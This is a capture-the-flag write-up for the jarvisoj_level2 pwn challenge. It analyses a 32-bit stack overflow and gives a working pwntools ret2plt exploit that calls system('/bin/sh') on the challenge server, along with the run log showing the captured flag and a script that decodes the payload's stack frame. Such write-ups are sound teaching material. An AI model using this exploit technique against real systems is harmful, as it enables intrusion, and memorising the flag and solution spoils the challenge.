A write-up of how I worked through this challenge.
bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2
[*] '/home/bing/pwn/jarvisoj_level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

2. Solution analysis

The very first statement in main calls the vulnerable function.
The vulnerable function's buf is only 136 bytes, so there is clearly a stack overflow. The function itself calls system directly, so we try looking for /bin/sh: Shift+F12 (IDA's strings window), and sure enough /bin/sh is there.
Double-click /bin/sh to get its exact address: binsh_addr = 0x0804A024
Construct the payload:

payload = b'a'*(136+4) + p32(system_addr) + p32(main_addr) + p32(binsh_addr)

3. Writing the EXP
from pwn import *

context.log_level = 'debug'
sh = remote('node4.buuoj.cn', 27139)
elf = ELF('./jarvisoj_level2')

system_addr = elf.plt['system']   # system@plt, resolved from the binary
binsh_addr = 0x0804a024           # address of the "/bin/sh" string found in IDA
main_addr = elf.sym['main']       # fake return address for system()
# print(hex(main_addr))

# 136 bytes of buf + 4 bytes of saved EBP, then the forged frame:
# return address -> system@plt, system's return address -> main, argument -> "/bin/sh"
payload = b'a'*140 + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
sh.sendline(payload)
sh.interactive()

4. Run the EXP and get the flag
bing@bing-virtual-machine:~/pwn$ python3 level2.py
[+] Opening connection to node4.buuoj.cn on port 27139: Done
[*] '/home/bing/pwn/jarvisoj_level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
0x8048480
[DEBUG] Sent 0x9d bytes:
    00000000  61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    00000080  61 61 61 61 61 61 61 61 61 61 61 61 20 83 04 08  │aaaa│aaaa│aaaa│ ···│
    00000090  80 84 04 08 24 a0 04 08 80 84 04 08 0a           │····│$···│····│·│
    0000009d
[*] Switching to interactive mode
[DEBUG] Received 0x7 bytes:
    b'Input:\n'
Input:
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2b bytes:
    b'flag{f00f79fd-9a06-402c-b0e8-ad00ad7eaa88}\n'
flag{f00f79fd-9a06-402c-b0e8-ad00ad7eaa88}
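To make the stack layout behind the payload explicit, here is an added example that is not part of the original write-up and does not use pwntools. It rebuilds the same 32-bit ret2plt frame with the standard library and decodes it back into named fields, so the role of each dword (return address, the address system() returns to, the argument) is visible. The system@plt value 0x08048320 is read off the hexdump above (bytes 20 83 04 08), main is 0x8048480 from the printed log line, and the /bin/sh address is the one found in IDA; p32/u32 are local helpers, not the pwntools functions.

```python
import struct

# Values taken from the write-up above (this binary has no PIE, so they are fixed).
BUF_SIZE = 136           # size of buf in the vulnerable function
SAVED_EBP_SIZE = 4       # saved EBP sits between buf and the return address
SYSTEM_PLT = 0x08048320  # system@plt, as seen in the hexdump (20 83 04 08)
MAIN_ADDR = 0x08048480   # printed by the exploit run
BINSH_ADDR = 0x0804A024  # "/bin/sh" string found via Shift+F12


def p32(value):
    """Pack a 32-bit little-endian dword (local stand-in for pwntools' p32)."""
    return struct.pack("<I", value)


def u32(data):
    """Unpack a 32-bit little-endian dword."""
    return struct.unpack("<I", data)[0]


def build_payload(buf_size=BUF_SIZE, callee=SYSTEM_PLT,
                  ret_after=MAIN_ADDR, arg=BINSH_ADDR):
    """Lay out an i386 (cdecl) ret2plt frame.

    When the vulnerable function executes `ret`, ESP points just past the
    overwritten return address, so the callee sees the stack exactly as if
    it had been called normally:
        [ callee's return address ][ first argument ] ...
    That is why the dword after system@plt is where system() returns to
    (main here, so the program keeps running), and the dword after that is
    the pointer passed to system().
    """
    padding = b"a" * (buf_size + SAVED_EBP_SIZE)
    return padding + p32(callee) + p32(ret_after) + p32(arg)


def describe_payload(payload, buf_size=BUF_SIZE):
    """Decode a payload back into named fields so the frame layout is visible."""
    off = buf_size + SAVED_EBP_SIZE
    if len(payload) < off + 12:
        raise ValueError("payload too short to hold padding + three dwords")
    return {
        "padding_len": off,
        "ret_addr": u32(payload[off:off + 4]),          # overwritten return address
        "callee_return": u32(payload[off + 4:off + 8]),  # where the callee returns
        "callee_arg": u32(payload[off + 8:off + 12]),    # callee's first argument
        "total_len": len(payload),
    }


def frame_report(payload, buf_size=BUF_SIZE):
    """Human-readable view of the decoded frame, one line per field."""
    d = describe_payload(payload, buf_size)
    return "\n".join([
        f"[buf+saved ebp] {d['padding_len']} bytes of padding",
        f"[ret]           0x{d['ret_addr']:08x}  (jumps into the callee)",
        f"[callee ret]    0x{d['callee_return']:08x}  (callee returns here)",
        f"[arg0]          0x{d['callee_arg']:08x}  (callee's first argument)",
        f"total           {d['total_len']} bytes",
    ])


if __name__ == "__main__":
    print(frame_report(build_payload()))
```

Running it prints the three dwords in the same order they appear at offset 0x8c of the hexdump in the log above, which is a quick way to confirm that an offset of 136+4 puts system@plt exactly on the saved return address.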